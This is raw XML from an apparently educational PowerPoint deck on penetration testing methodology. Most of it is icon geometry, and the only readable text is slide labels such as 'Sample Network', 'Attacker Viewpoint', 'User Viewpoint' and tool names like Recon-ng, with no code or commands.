                  <a:pt x="12764" y="5400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12228" y="6828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="6828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59" name="Shape 2959"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="46392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8" y="3927"/>
                  <a:pt x="4909" y="5247"/>
                  <a:pt x="4909" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="8500"/>
                  <a:pt x="6228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7"/>
                  <a:pt x="9056" y="14727"/>
                  <a:pt x="9327" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9598" y="14727"/>
                  <a:pt x="9818" y="14947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0" name="Shape 2960"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="4677314"/>
            <a:ext cx="279362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21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="17140" y="11946"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15736" y="13192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1"/>
                  <a:pt x="6815" y="1350"/>
                  <a:pt x="10508" y="1350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14201" y="1350"/>
                  <a:pt x="17194" y="5581"/>
                  <a:pt x="17194" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17194" y="11189"/>
                  <a:pt x="17172" y="11570"/>
                  <a:pt x="17140" y="11946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1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2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15984" y="17519"/>
                  <a:pt x="13473" y="20250"/>
                  <a:pt x="10508" y="20250"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20938" y="6356"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20592" y="4617"/>
                  <a:pt x="19141" y="3452"/>
                  <a:pt x="17072" y="2964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17380" y="3481"/>
                  <a:pt x="17660" y="4034"/>
                  <a:pt x="17905" y="4620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49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3"/>
                  <a:pt x="18149" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18149" y="4835"/>
                  <a:pt x="14728" y="0"/>
                  <a:pt x="10508" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6288" y="0"/>
                  <a:pt x="2867" y="4835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5"/>
                  <a:pt x="997" y="13528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="893" y="13003"/>
                  <a:pt x="982" y="12389"/>
                  <a:pt x="1263" y="11700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1416" y="11327"/>
                  <a:pt x="1650" y="10926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5"/>
                  <a:pt x="18017" y="12755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20167" y="10724"/>
                  <a:pt x="21339" y="8374"/>
                  <a:pt x="20938" y="6356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1" name="Shape 2961"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4118515" y="4639224"/>
            <a:ext cx="20314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6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2" name="Shape 2962"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="463922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5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5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1"/>
                  <a:pt x="6719" y="21600"/>
                  <a:pt x="8345" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9804" y="21600"/>
                  <a:pt x="11007" y="20537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5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3" name="Shape 2963"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="4702708"/>
            <a:ext cx="279328" cy="1523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3"/>
                  <a:pt x="5535" y="1800"/>
                  <a:pt x="10800" y="1800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16065" y="1800"/>
                  <a:pt x="20349" y="9783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1"/>
                  <a:pt x="8779" y="12600"/>
                  <a:pt x="10800" y="12600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12821" y="12600"/>
                  <a:pt x="14485" y="15751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8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8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4" name="Shape 2964"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="4677314"/>
            <a:ext cx="279328" cy="2031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4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5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5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8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59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5"/>
                  <a:pt x="2945" y="8775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="9114"/>
                  <a:pt x="2973" y="9445"/>
                  <a:pt x="3022" y="9764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1267" y="10569"/>
                  <a:pt x="0" y="12841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5" name="Shape 2965"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="5235969"/>
            <a:ext cx="279328" cy="165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4"/>
                  <a:pt x="3929" y="9410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8" y="3081"/>
                  <a:pt x="12948" y="5461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6"/>
                  <a:pt x="14419" y="5809"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14777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7" y="8447"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17646" y="9234"/>
                  <a:pt x="17953" y="9937"/>
                  <a:pt x="18404" y="10132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19708" y="10697"/>
                  <a:pt x="20618" y="12680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8" y="8523"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18650" y="8451"/>
                  <a:pt x="18655" y="8381"/>
                  <a:pt x="18655" y="8308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="5556"/>
                  <a:pt x="17335" y="3323"/>
                  <a:pt x="15709" y="3323"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14967" y="3323"/>
                  <a:pt x="14290" y="3791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4" y="9259"/>
                  <a:pt x="18648" y="852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6" name="Shape 2966"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="51978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6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7" y="7626"/>
                  <a:pt x="12457" y="9344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8"/>
                  <a:pt x="14419" y="10195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14777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7" y="12101"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17646" y="12669"/>
                  <a:pt x="17953" y="13177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2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7" y="8400"/>
                  <a:pt x="14290" y="8738"/>
                  <a:pt x="13773" y="9292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13082" y="7989"/>
                  <a:pt x="12054" y="6984"/>
                  <a:pt x="10843" y="6443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11149" y="3488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4" y="11304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3"/>
                  <a:pt x="9890" y="6130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9547" y="6053"/>
                  <a:pt x="9198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7"/>
                  <a:pt x="20778" y="13443"/>
                  <a:pt x="19575" y="1262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7" name="Shape 2967"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381" y="5185182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8" name="Shape 2968"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="5197879"/>
            <a:ext cx="279328" cy="228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6"/>
                  <a:pt x="3988" y="6312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4343" y="3397"/>
                  <a:pt x="6427" y="1200"/>
                  <a:pt x="8836" y="1200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10501" y="1200"/>
                  <a:pt x="11547" y="1626"/>
                  <a:pt x="12457" y="3344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3" y="4492"/>
                  <a:pt x="13773" y="4492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14009" y="4492"/>
                  <a:pt x="14238" y="4388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6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3" y="7177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8"/>
                  <a:pt x="13773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80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7"/>
                  <a:pt x="14871" y="16976"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11926" y="20575"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11837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69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69"/>
                  <a:pt x="12544" y="16800"/>
                  <a:pt x="12273" y="16800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12137" y="16800"/>
                  <a:pt x="12015" y="16867"/>
                  <a:pt x="11925" y="16976"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8981" y="20575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3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69"/>
                  <a:pt x="6653" y="16800"/>
                  <a:pt x="6382" y="16800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6246" y="16800"/>
                  <a:pt x="6124" y="16867"/>
                  <a:pt x="6034" y="16976"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3090" y="20575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5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69"/>
                  <a:pt x="9598" y="16800"/>
                  <a:pt x="9327" y="16800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9192" y="16800"/>
                  <a:pt x="9069" y="16867"/>
                  <a:pt x="8980" y="16976"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6035" y="20575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3" y="17716"/>
                  <a:pt x="9818" y="17566"/>
                  <a:pt x="9818" y="17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69" name="Shape 2969"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="5185182"/>
            <a:ext cx="279328" cy="2539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0"/>
                  <a:pt x="3244" y="6572"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3634" y="6470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7" y="1463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49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3" y="6459"/>
                  <a:pt x="18404" y="6586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3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4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4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2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2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2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2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0" name="Shape 2970"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="51724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6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6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1" name="Shape 2971"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="51724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4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8"/>
                  <a:pt x="17182" y="16336"/>
                  <a:pt x="17182" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17182" y="15929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4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8"/>
                  <a:pt x="6873" y="16336"/>
                  <a:pt x="6873" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="15929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2" name="Shape 2972"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="51724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0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6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2"/>
                  <a:pt x="18404" y="5987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0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2"/>
                  <a:pt x="10944" y="14872"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7999" y="17816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2"/>
                  <a:pt x="11782" y="18299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3" name="Shape 2973"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="5191530"/>
            <a:ext cx="279328" cy="24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4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4" name="Shape 2974"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="517248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3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11859" y="13768"/>
                  <a:pt x="11545" y="13525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4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10457" y="10268"/>
                  <a:pt x="10529" y="9832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0"/>
                  <a:pt x="11859" y="7823"/>
                  <a:pt x="12225" y="7651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12590" y="7479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8"/>
                  <a:pt x="15287" y="8318"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16494" y="7367"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16059" y="6830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6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1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6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5" name="Shape 2975"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6289650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5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5" y="5897"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9825" y="5897"/>
                  <a:pt x="9825" y="15704"/>
                  <a:pt x="9825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6" name="Shape 2976"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822911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7" name="Shape 2977"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7356172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5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8" name="Shape 2978"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889433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79" name="Shape 2979"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8422694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2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80" name="Shape 2980"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8955955" y="4677314"/>
            <a:ext cx="279328" cy="279328"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:pr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81" name="Shape 2981"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9489216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2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82" name="Shape 2982"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10022477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83" name="Shape 2983"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10555738" y="4677314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2984" name="Shape 2984"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11165180" y="4677314"/>
            <a:ext cx="12696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3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3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6" name="Shape 2707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5573336" y="4127425"/>
            <a:ext cx="847338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WEATHER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7" name="Shape 2707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5617256" y="899634"/>
            <a:ext cx="759493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ARROWS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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Shape 2707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5571091" y="2762083"/>
            <a:ext cx="851826" cy="269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45" tIns="19045" rIns="19045" bIns="19045" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3000" b="1" cap="none" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="1C1D21"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Karla"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="0" dirty="0">
                <a:latin typeface="Roboto Regular" charset="0"/>
                <a:ea typeface="Roboto Regular" charset="0"/>
                <a:cs typeface="Roboto Regular" charset="0"/>
              </a:rPr>
              <a:t>LOCATION</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" dirty="0">
              <a:latin typeface="Roboto Regular" charset="0"/>
              <a:ea typeface="Roboto Regular" charset="0"/>
              <a:cs typeface="Roboto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6199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D5FCE4-0324-4C46-A8FE-BF7FB6DA3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1" y="307731"/>
            <a:ext cx="10451339" cy="399763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A61EA9-F179-6748-8026-CDE5073ED377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-29880" y="4520076"/>
            <a:ext cx="12196660" cy="2337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24A26F-32FE-4B6D-B84C-9864FC1E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5090450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KANBAN boards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702EC6-6CE5-5649-9D43-8107B55E1065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589968" y="5049530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E2D76-842F-9A42-B16B-AA8F52920D0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296311" y="5634453"/>
            <a:ext cx="837760" cy="11053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2122C9-C24A-CD43-8C1D-EA0DB577D5E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041420" y="5582772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Project Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38058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660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0315" y="1247882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Sample Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275382" y="2728710"/>
            <a:ext cx="27504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Here’s our target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37" descr="A screenshot of text&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F664801C-1624-1749-8080-85902E06B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614" y="888098"/>
            <a:ext cx="8127861" cy="59536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1F3147-D7EB-CF41-86FC-469C12B6D387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497639" y="104796"/>
            <a:ext cx="787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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SAMPLE NETWORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3743217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BD53E9-90C2-43E4-98CF-9AD2B9F7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85" y="1323067"/>
            <a:ext cx="8164447" cy="3286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2DAA06-0221-B54C-9B68-27CA967657C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4660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85A94-27A2-E841-B3C3-3F44EE0DE3DD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3B368E-C2EA-544A-9A4E-688D77E28E21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8897-21A7-1446-AB74-A19E44243E6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130315" y="1247882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Sample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1471D-C977-C64B-A87A-A54EBF6ABFC7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Some external websites</a:t>
            </a:r>
          </a:p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VPN concentrator</a:t>
            </a:r>
          </a:p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Mail (?)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18929-A136-5746-8B65-9C728328BD0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497639" y="142504"/>
            <a:ext cx="787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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ATTACKER VIEWPOINT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158365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6FB2351-5685-4B9E-B8D0-AA2F92D5D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00" y="1153040"/>
            <a:ext cx="9149586" cy="45519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88A00F-C9A9-304D-9A97-C43A550EAA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4660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78CB3E-BB95-5D49-BE00-E1635B9221DE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367321-5F6B-9548-BD5B-CC24E2376623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DC17A-BD94-D54B-A40D-EFDB9531F3B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130315" y="1247882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Sample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59836D-A583-7340-84A1-5270D42D7B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275382" y="2728710"/>
            <a:ext cx="27504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Clients on the network might only know about their own workstations and the website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400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Maybe even the fact they get blocked from a firewall.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A6F54-2047-3E48-9537-731A32654FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497639" y="142504"/>
            <a:ext cx="787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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>USER VIEWPOINT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2805362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BD53E9-90C2-43E4-98CF-9AD2B9F7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085" y="1323067"/>
            <a:ext cx="8164447" cy="3286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2DAA06-0221-B54C-9B68-27CA967657C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4660" y="0"/>
            <a:ext cx="302585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885A94-27A2-E841-B3C3-3F44EE0DE3DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1124456" y="662959"/>
            <a:ext cx="1379042" cy="1379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3B368E-C2EA-544A-9A4E-688D77E28E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830799" y="1247882"/>
            <a:ext cx="837760" cy="1269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48897-21A7-1446-AB74-A19E44243E6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130315" y="1247882"/>
            <a:ext cx="1928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Sample Network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1471D-C977-C64B-A87A-A54EBF6ABFC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275382" y="2728710"/>
            <a:ext cx="275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Some external websites</a:t>
            </a:r>
          </a:p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VPN concentrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty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Mail (?)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18929-A136-5746-8B65-9C728328BD0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497639" y="142504"/>
            <a:ext cx="787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77"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ATTACKER VIEWPOINT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1215926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1789</TotalTime>
  <Words>1014</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>267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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Karla</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Lato Regular</vt:lpstr>
      <vt:lpstr>Open Sans Light</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Regular</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>About Kateo</vt:lpstr>
      <vt:lpstr>Penetration testing methodology</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>KANBAN boards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RECON-NG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Penetration Testing</dc:title>
  <dc:creator>secureideas@outlook.com</dc:creator>
  <cp:lastModifiedBy>secureideas@outlook.com</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-30T18:49:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-05T06:07:56Z</dcterms:modified>
</cp:coreProperties>
</file>